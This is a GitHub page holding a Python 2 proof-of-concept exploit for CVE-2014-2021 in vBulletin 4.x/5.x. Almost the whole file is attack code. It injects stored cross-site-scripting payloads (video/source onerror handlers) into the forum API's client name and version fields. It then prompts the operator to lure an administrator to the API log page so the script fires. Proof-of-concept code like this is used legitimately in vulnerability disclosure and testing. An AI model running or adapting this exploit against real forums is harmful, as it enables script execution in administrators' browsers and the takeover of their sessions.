-
Notifications
You must be signed in to change notification settings - Fork 125
/
poc_cve-2014-2021.py
151 lines (128 loc) · 5.18 KB
/
poc_cve-2014-2021.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib
class Exploit(object):
baseurl = None
cookies = None
def __init__(self,baseurl,params, debuglevel=1):
self.cookies = cookielib.LWPCookieJar()
handlers = [
urllib2.HTTPHandler(debuglevel=debuglevel),
urllib2.HTTPSHandler(debuglevel=debuglevel),
urllib2.HTTPCookieProcessor(self.cookies)
]
self.browser = urllib2.build_opener(*handlers)
self.baseurl=baseurl
self.params = params
def call(self,path="",data={}):
assert(isinstance(data,dict))
data = urllib.urlencode(data)
req = urllib2.Request("%s%s"%(self.baseurl,path),data)
req.add_header("Content-Type", "application/x-www-form-urlencoded")
return self.browser.open(req)
def call_json(self,path=None,data={}):
try:
x=self.call(path,data).read()
print "raw_response", x
resp = json.loads(x)
except urllib2.HTTPError, he:
resp = he.read()
return resp
def vb_init_api(self):
params = {'api_m':'api_init'}
params.update(self.params)
data = self.call_json("?%s"%(urllib.urlencode(params)))
self.session = data
return data
def vb_call(self, params):
api_sig = self._vb_build_api_sig(params)
req_params = self._vb_build_regstring(api_sig)
params.update(req_params)
data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
if not isinstance(data, dict):
return data
if 'errormessage' in data['response'].keys():
raise Exception(data)
return data
def _ksort(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( "%s=%s"%(key,value))
return "&".join(ret)
def _ksort_urlencode(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( urllib.urlencode({key:value}))
return "&".join(ret)
def _vb_build_api_sig(self, params):
apikey = self.params['apikey']
login_string = self._ksort_urlencode(params)
access_token = str(self.session['apiaccesstoken'])
client_id = str(self.session['apiclientid'])
secret = str(self.session['secret'])
return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
def _vb_build_regstring(self, api_sig):
params = {
'api_c':self.session['apiclientid'],
'api_s':self.session['apiaccesstoken'],
'api_sig':api_sig,
'api_v':self.session['apiversion'],
}
return params
if __name__=="__main__":
TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php"
APIKEY = "G4YvWVhp"
DEBUGLEVEL = 0 # 1 to enable request tracking
print "vBulletin 5.x / 4.x - XSS in API"
### 1. XSS
'''
vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options
* enable vbulletin API = yes
* enable API log = yes
xss in:
1) http://xxxx/vb/admincp/apistats.php?do=client
2) click on hex<video><source/**/onerror='alert(1)'>hex
2.1) e.g. http://xxxx/vb/admincp/apilog.php?do=viewclient&apiclientid=1
'''
params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1",
'clientversion':"hex<video><source/**/onerror='alert(2)'>hex2",
'platformname':"hex<video><source/**/onerror='alert(3)'>hex3",
'platformversion':"hex<video><source/**/onerror='alert(4)'>hex4",
'uniqueid':"hex<video><source/**/onerror='alert(5)'>hex5",
'apikey':APIKEY}
print "[ 1 ] - xss - inject alert() to admincp"
x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL)
vars = x.vb_init_api()
print vars
"""
$calls = array(
'methods' => array(
'login_login', 'api_init'
),
'login_login' => array(
'POST' => array(
'vb_login_username' => 'admin',
'vb_login_password' => 'password',
),
),
'api_init' => array(
'sessionhash' => '{session.dbsessionhash}'
)
);
"""
print "[*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>')
'''
calls = {'methods':['api_init'],
'api_init':{
'sessionhash':vars['sessionhash']
}}
'''
# just a dummy call
x.vb_call(params={'api_m':'api_forumlist',
'type':'t',
'x':"1"})
print "[ *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid'])
print "-- quit --"